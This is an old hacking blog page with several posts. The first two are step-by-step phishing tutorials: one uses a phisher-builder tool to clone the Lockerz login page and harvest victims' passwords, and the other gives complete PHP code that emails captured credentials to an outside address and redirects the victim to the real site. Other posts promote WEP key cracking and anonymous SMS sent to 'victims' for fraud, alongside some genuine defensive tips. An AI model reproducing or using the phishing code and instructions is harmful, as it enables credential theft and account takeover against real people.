Saturday, December 10, 2011

How to Create Your Own Phisher to Hack Any Website Account Password

Learn how to hack any website account password | Phishing Creator Tool

Previously i've posted how to hack websites using phishing, like eBay, Gmail and Facebook. Here GV want to show you how to make a phishing page using a Phishing Creator - Super Phisher and get account information for various websites from many people. Тhis is the easyest and also a very effectively way to make a phisher and hack any website account password.

Here are some features of Super Phisher:
  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who dont knows HTML, PHP coding
  • No manual work except entering URL of website, for which u want to make phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

For example i will show you how to make a phishing site of Lockerz.com.

Here is a step by step guide to hack any website account password using phishing creator tool:

1. First of all download Super Phisher here.

2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:


3. Now, in "URL of Login Page", enter http://www.lockerz.com. This is the site you wanna hack.

4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...

5. In field of "Site redirect to", enter http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.

6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.

7. Upload all of the phisher files to any free webhost site like:
8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.

9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".


10. Now you can see password in this .txt file and hack Lockerz account password.


Super Phisher is just awesome software to hack Lockerz account password. This software not only is used to hack Lockerz account password, but also can hack orkut, gmail, yahoo, myspace and many other emails.


Also read:
How to Make a Phisher - Step by Step Tutorial 

Do you have questions, comments, or suggestions? Feel free to post a comment! 

How to Make a Phisher to Hack Any E-Mail Account Password

Make a phishing page to get account information for various websites from many people

Previously i've posted how to hack TwittereBayGmail and Facebook account passwords using phishing. Basicly phishing is way of sending a fake page to victim which resembles the original page and ask the victim to login with the provided modified page called as phisher. This the most popular method used by hackers to hack email account passwords like myspace, gmail, yahoo, orkut, facebook, etc. Here, i will inform you the method to make a "phisher".
How to Make Phisher to Hack E-Mail Account Passwords:


Making a phisher is very simple. You don’t have to know anything about coding. Just follow me as mentioned in below steps:

1. First of all go to the website you want to copy, and locate the login page.


2. Right click, and click on Source. Highlight all and copy onto a text document.

3. Go into the source and search for <form (Ctrl + F and search the code), when you find it look along the tag and find action=" and inside it there will be a URL, delete that url and type in login.php

4. Now you need to find where the textboxes are. To do this find a label next to one of the inputs, eg 'E-mail address:' Then go into the source and search for 'E-mail address:' then follow it along until you see <input name= "login"

Click on the image to see the full size

5. Now open up notepad and post the following code, and then follow instuctions after the //

<?php
//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = 'ozsanchez@hotmail.co.uk';
//Put what you want the subject to be
$subject = 'New password found, $log_email's email.';
//define the message to be sent. Each line should be separated with \n
$message = "E-mail: $log_email\n\nPassword: $Password";
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = "From: ozsanchez@hotmail.co.uk";
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header('Location: https://login.live.com/ppsecure/post.srf?id=66262');
?>

6. Save it as login.php

7. Upload both files onto your website or to a free-hosting site like:

Good trick to make link longer is to put '?' after any page and put anything after it.

You can get someones ip address by if you put at the top of the login.php file this code:

$ip_address = $_SERVER['REMOTE_ADDR'] 


Note: I have written this article to make you aware of how phishing is done. I am not in any way responsible for any action performed by the reader. The reader is solely responsible for his action. (as Mentioned in GV's Info)



Do you have questions, comments, or suggestions? Feel free to post a comment! 

Wireless Wep Key Hacking - For Beginners

 Thousands of articles have been written about the vulnerability of WEP (Wired Equivalent Privacy), but how many people can actually break WEP encryption? Beginners to WEP cracking have often been frustrated by the many wireless cards available and their distribution-specific commands. And things are further complicated when the beginner is not familiar with Linux.

In this post i will show you a book Wireless Wep Key Hacking where the author gives you a step by step approach to breaking a WEP key. The entire attack is done with publicly available software and doesn't require special hardware.



The author of this book is Haider Afridi, an expert into the field of hacking and security. This book is a complete guide of hacking WEP keys, and the best part of this e-book is that he has written it in such a manner that even a 5th grade kid can understand it.

I have personally hacked more than 10 wirelesses using the method presented in this book.

If you think this book is something you would be interested in, you can get it here,



Do you have questions, comments, or suggestions? Feel free to post a comment! 


How To Control Your Computer with Your Mobile Phone

Remotely Control Your PC from Anywhere with Your Cell Phone!

Have you ever been away from your desktop and needed some information that was on it? Have you ever needed to shutdown your computer or do something underhanded while away? In this post I am going to show you how to control your PC from your Cell Phone.

There is a program called CellPC that allows you to perform operations on your home/work PC via your cell phone or wireless device quickly and easily. Imagine being able to shutdown, restart, or logoff your PC remotely... search files on your computer and then send them to your cell phone... view a realtime screenshot of your computer at anytime... lockdown your computer... send a message/note/reminder to your computer... and much more!

CellPC Top Features:

  • Perform Shutdowns, Restarts, Logoffs
  • View a Screenshot of your Computer
  • Search for and Retrieve Files
  • View and Close Open Windows
  • Customizable Commands Editing
  • Be Alerted when your Computer is Used View and Close Open Applications
  • Send Messages to your Computer
  • Lock and Unlock your Computer
  • Secure Command Execution
  • Log all Access Attempts and Commands
  • Disable/Enable Commands at will


How does CellPC Work? 



Will CellPC Work for Me?

CellPC can work with any Windows computer as long as it has a steady internet connection while the software is running.

If you want to verify that CellPC will work with your device, contact the CellPC support team so you can send them a test message from your phone.



Do you have questions, comments, or suggestions? Feel free to post a comment! 

Surf Anonymously Without a Trace with Max AnonySurf

With online crimes on the rise and there constantly evolving technology, online security has become the major concern for the internet users.

Max Secure Software has developed anonymizing software Max AnonySurf to protect the privacy and secure the identity by staying one step ahead of these online predators. Max AnonySurf hides your IP address so that online snoops are unable to track the sites you visit and build profiles on your Internet activities. Max AnonySurf also protects you from unintentionally visiting websites that are known to be phishing, pharming, or spyware sites.

Anonymous Surfing works by providing anonymous proxies between your computer and the Internet to shield you. It's simple to setup and use, and it works silently in the background, without slowing down your Internet connection. Others can not see which ip address you are using to surf. It even rotates proxy addresses so you do not show one ip address to outside world.

Once you install on your own computer, it will allow you to surf the web with privacy. This local proxy server includes a database with several anonymous public proxy servers located all over the world. The program is essential for those who value their privacy and who want to surf the web anonymously.

Max AnonySurf Top Features:

  • Max AnonySurf keeps your IP, or Internet address, unlisted so you can surf the Internet without being tracked and keep your online activities private.
  • Max AnonySurf is easy to use. Makes a snap for even novice users so you can start surfing anonymously with a single click of a button. Just install it and get started!
  • Automatic protection - Starts automatically when you turn on your PC and runs silently in the background without slowing down your Internet connection for hassle-free security.
  • Max AnonySurf works by providing anonymous proxies between your computer and the Internet to shield you. Others cannot see which IP address you are using to surf. It even rotates proxy addresses so you do not show one IP address to outside world.
  • You can set the timer to rotate the proxy address when you are surfing.


Max AnonySurf is one of the best anonymizing softwares I've tried, but still it's the cheapest software on the market with price of only $9.99. So if you are looking for a software that can protect your privacy and secure your identity, but still includes both, quality and small price, you wont regret if you try Max AnonySurf.


Do you have questions, comments, or suggestions? Feel free to post a comment! 


10 Best Yahoo! Messenger Tricks and Hacks

 Yahoo! Messenger is an instant messaging program which is compatible with all Windows versions. While instant messaging is the focus of Yahoo! Messenger, there are several special tricks that can enhance the user experience. 

Here are my 10 Best Yahoo! Messenger Tricks and Hacks: 

1. Find invisible users on your Yahoo! Messenger list 

Want to find out someone who’s hiding from you? You can easily do so by going to Yahoo! Invisible Checker. All you need to do is type in the Yahoo! ID and the particular users status will be revealed. 

2. Invisible nickname on chat rooms 

Just go to edit profile and in the nick name type a (space character) on it just press Alt 0160 ( or ALT+255 ) and save it. 

Now go to any Yahoo! chat room and you’ll notice that your nick name is empty. [Alt+0160 is a keyboard shortcut for space] 

3. Run Multiple Instances of Yahoo! Messenger on same system 

Some of you might be having more than one Yahoo! ID would like to log in simultaneously. Here is an easy way to do it without installing any sort of software. You just have to edit the registry and voila there you go. Follow the instructions below: 

  • Download the following -multiyahoo.reg and save it to your hard disk.
  • Double click on it. 


  • The above dialog will popup, click ‘Yes
  • Start the yahoo messenger login with your first ID. Then again start another yahoo messenger by clicking on the messenger icon and log in with your second ID.This tweak works with all versions of Yahoo Messengers. 


4. Removing Ads from your Yahoo! Messenger 

If you are using Yahoo! Messenger 8.0, then you can disable ads by following the below steps: 
  • First close the Yahoo! Messenger.
  • Save this .bat file and execute it. (Note: You won’t be able to enter the chat rooms if you use this patch.) 

The above fix doesn’t work for Yahoo! Messenger 9 Beta. Here’s a way to disable the ads in Yahoo! Messenger 9: 
  • Make sure the Yahoo! Messenger isn’t running, if it is then just close it.
  • Now backup the following file C:\Program Files\Yahoo!\Messenger\Yahoo!Messenger.exe (create a new copy)
  • Download HxD hex editor.
  • Open C:\Program Files\Yahoo!\Messenger\Yahoo!Messenger.exe in the hex editor
  • Now go to the offset 295928 (in HxD: Search/GoTo)
  • Look at the right column and replace y from “y.m.s.g.r.a.d.s” with p
  • Save the file and close HxD. 
Note: This approach breaks Yahoo! Messenger’s terms of service. 

If nothing works try launching this file

5. Yahoo! Smiley Codes 

You can make use of all smileys including hidden ones in your messenger by using YEmotePLUS plugin. 

6. Creating Custom Profiles for Chat 

You can create custom profiles with different name, sex and other details from Yahoo! Create/Edit Profiles. You can use these for chat services only. 

7. Change the Yahoo! Messenger Title Bar 

You can change the text that appears at the very top of the Yahoo! messenger window by editing theymsgr.ini file. 

1. Go to Program Files\Yahoo!\ and open ymsgr.ini. 

2. Then at the end, type this: 

[APP TITLE] 
caption=YOUR TEXT 

3. Change YOUR TEXT to whatever you want it to say. Then save the file and close messenger. When you restart messenger you will see your new message. 

8. Online Status Changer and Manager 

HyperIM is currently the best status changer & manager for Yahoo! messenger available at present. You can download it here

9. Access Yahoo! Messenger Chat archives while offline 

You can access your Yahoo! chat logs using Yahoo! Message Archive Decoder. It reads Yahoo! Messenger archive files (.dat files) and presents them in a format that you can read. It decodes the message archive without logging in (offline mode and no passwords required). You can download it here

10. Retrieve Yahoo! Messenger Display pictures 

Y! Display Pic will retrieve Yahoo! users even if they are offline or invisible. You can download it here

Do you have questions, comments, or suggestions? Feel free to post a comment! 

How to set up a secure network



Whether it is home or small businesses, setting up a secure network will save you a lot of anxiety and time. There are a lot of advantages in setting up a secure network, for example, you can connect, share and access several electronic gadgets such as, computers, printers, scanners and the like. You have the option of Wireless or Wired networks and it depends on your budget and convenience. This article will guide you to set up your own secure network without having to hire a professional. In a network connection Network security is vital to protect your data. You can either purchase Network security software or download free Network security tools to safe guard your network from intruders.

Planning is important before you start setting up. Fix the location, where you will be placing your equipments. Determine the number of gadgets you would want to connect and also make provisions for any additions in the future. Accordingly purchase the 802.11n router [apart from Wi-Fi it has 4 Ethernet ports], modem, Ethernet cables, connectors and fasteners. In case your gadgets are wi-fi enabled, you can avoid Ethernet cables and set up a wi-fi network.

The next step is to run the cables. Connect the cables between the Ethernet ports of the router and cable/DSL modem. It is a common practice to run the cables either under the floor on the sides of the walls so that they don’t hinder movements. Connect the PCs and other equipments to the router using the Ethernet cables you just laid. Once you are done connect the power to modem and them to router. Let the diagnostics check on modem complete before switching on the router. You can now switch on your computer and test your network connection. If you have been already using internet connection, your system will automatically connect to the internet else you will have to set up as per the instructions of the service provider.

With Ethernet connectivity, your router should automatically start working. However, you will have to install the software supplied to initialize the wireless functions if you are using Wi-fi connectivity.

Protecting your network connection is the most important step of all. You can adjust the settings of the router through its administrative page using a browser by following the instructions in the manual. It is during this stage you will change the SSID and disable SSID broadcast setting. You can also enable the firewall on the wireless router. When it comes to network security, you can find numerous Network security tools available in the market. There are companies that provide free network security software in the internet. Utilize them and protect your network from intrusions.

In case, you find the network jargons difficult, you can choose companies that supply kits according to your needs. While setting up your own network connection is easy, it indeed requires quiet an amount of physical labor. If you are not used to such hard tasks, it is worth hiring professionals who can do the job for you.

Do you have questions, comments, or suggestions? Feel free to post a comment! 

How to Detect Fake Emails

 Yesterday one of my readers asked me about the way to detect a fake mail. I thought that this can become a good point for writing an article. So, I am mentioning some tips to detect fake/fraud/spam mails.

How to Detect Fake Mails:

1. Lets get back to the example I illustrated in my article Fake Mailer. I had used "support@gmail.com" as the sender email address. No doubt, this was fake and the receiver will get the fake email sent by me.

2. Suppose you are the receiver. Now, I will tell you how to recognize this mail as fake. Open the email and hit on "Show Details".

3. Something you must know:



Whenever Google sends you any email, the email details will contain fields like:

- Mailed by
- Signed by (optional)


Also, most of the times, "Mailed by" field will have value:

*.bounces.google.com or
*.google.com


depending on the type of your mail. This is true for every genuine email from every mail provider.

4. But, these two fields will not be present in the details of Fake Mail. Also, if the mail details contain these fields, the value of these fields will not be *.google.com

Fake Mail without "Mailed by" field:



Fake Mail with "Mailed by" field.



As you can see, the "mailed by" field shows the hosting server's name and not the Google server. This means, this server is used to send you the fake email and most probably, the fake mailer is hosted on the same server.


You can also check out the header field to detect fake mails. Follow the steps:

- Open the mail. Hit on down arrow next to "Reply" and click on "Show Original".



- Now, check out "Received" fields. This field will show you the name of server from which the mail is sent. As you can see, we have used "emkei.cz" as our fake mailer. So, it has appeared in "Received" field.

More Tips:

- Fake Mail usually have attractive titles.
- Such mails address receiver as "Dear Customer" or such and do not use your real name.
- Never click on any link in emails. Instead, open such links manually in new tab. Refer my article Anti-Phishing measures for more information.

Follow these tips and you will be able to recognize fake, spoof, spam emails. If you know any other useful tip to detect fake or spam emails, please share it with us in comments. 

Do you have questions, comments, or suggestions? Feel free to post a comment! 


How To Send Free SMS Anonymously in India

 As we all know sending free anonymous text message have become very hard and there are very least sites which provide this facility, if they do so they charge heavy money from their customers. Many people didn't like to pay a penny for this. They just want those site which gives them the opportunity to send free and anonymous message to their friends, relative, many more. So this post is really for them, I hope that they will as well as all the people who read this will also like it.

The main purpose of sending these messages are:

  • To fool/fraud people
  • To gain money from innocent or illiterate people
  • Or it may be as a joke played to you by your friends, relative, or others

How To Send Anonymous Free Messages?

There are very very very least sites which provide the facility to send free messages anonymously. But I have found such a site which provide us to send free message anonymously.

Features of this site:
  • No Registration or Login required.
  • Send Unlimited 160 Characters Sms.
  • Check Message Delivery Report in Real Time.
  • They Don't Include Any Ads Along With Your Sms.
  • Very High Speed Message Delivery System.
Steps to send message:
  • Visit this website: Smsti
  • Write the victim's phone number and message
  • Then click on Send
  • You will be asked to write the words which you will see in a picture, provide them these words correctly
  • Finally Click on 'Agree to Terms'

Do you have questions, comments, or suggestions? Feel free to post a comment! 



Detect Hidden Trojans on Your Computer


Learn How to Detect Hidden Trojans/Viruses/Keyloggers on Your PC

Are you beware that there is a hidden Trojan, Virus or Keylogger working on your PC and sending your logins to hackers?

If you are in that situations you don't need to worry anymore. In this post i will show you a security software called Process Revealer that can detect and kill hidden processes.



Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.

Download Process Revealer Free Edition 

Do you have questions, comments, or suggestions? Feel free to post a comment! 


Top 7 Ways to Avoid Cyber Attacks

Viruses and identity theft are not new issues, but recently, individuals and companies are at a much greater risk as a result of the unanticipated increase in internet and technology use. Follow these tips to protect yourself from such an attack so that you won’t be the next victim. 

Foe example, you receive an email promising a great joke if you open the attachment. You're not sure who sent it but you feel like a laugh and open it anyway. Big mistake. 
Attackers can break into your computer by sending you an email attachment with malware (malicious software) or downloading malware on to your computer when you open a link on a webpage. 
They want to use personal and financial details on your computer to steal money, buy things on your credit card or open up bank accounts in your name. 

Anyone who uses the internet needs to be aware of basic computer security: 

1. Don't click the link 

If you don't know who sent the email, or if it's not a trusted website, then don't click the link. 

Beware: there is always an increase in email phishing scams around Christmas, whereby scammers have a fake retail store website and capture your credit card details when you buy online. 

2. Install Antivirus software 

Always have up-to-date antivirus protection and get regular updates, Don't press 'do it later' and update six weeks later. 

3. Use strong passwords 

Most of the population is still using '1234567' or their first name and last name, 

The problem is that there are about 20 different things that require passwords. The strategy now is to write them down it is a complete U-turn and put them in your wallet [which is usually in a safe place]. If you lose your wallet, you stop your credit cards and can also reset all your online passwords. 

* Never click 'remember my password'. 

* Use capitalslower casenumbers and symbols in passwords. Don't use words in the dictionary. 

* Change passwords regularly. 

* Password software is good at generating strong passwords but the human brain is the best tool of all. 

4. Keep software up to date 

This will ensure your software has the latest security upgrades. Attackers are always thinking up new ways to penetrate security. Don't ignore update notifications. 

5. Reconfigure wireless routers 

Buy a router with secure wireless encryption, otherwise your information is unprotected and can be stolen: for example, when banking or shopping online. 

When you get a new modem from a network provider, it may not be secured to encrypt traffic. People should go to the administration panel and configure their wireless network to WPA (Wi-Fi Protected Access) or WPA2 encryption. 

Reconfiguring routers is easy and something people don't do properly. 

Change the name of the router to something obscure, otherwise it gives attackers information on how best to attack that router. Also, change the default login to a unique password. 

6. Encrypt email 

Learn to use email encryption for sensitive documents. 

Don't send emails such as a child's health resume using Gmail or Hotmail. "There was [the recent case] where a Gmail employee started going through people's email accounts." 

7. Use a secure web browser 

Firefox or Opera are secure web browsers 

"Internet Explorer is highly targeted by attackers because it is on so many machines. IE generally takes longer to patch or fix vulnerabilities." 

Eliminating internet and computer use from your life is impossible, so be sure to practice safe computing habits to protect yourself from cyber attacks. 

Do you have questions, comments, or suggestions? Feel free to post a comment! 

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More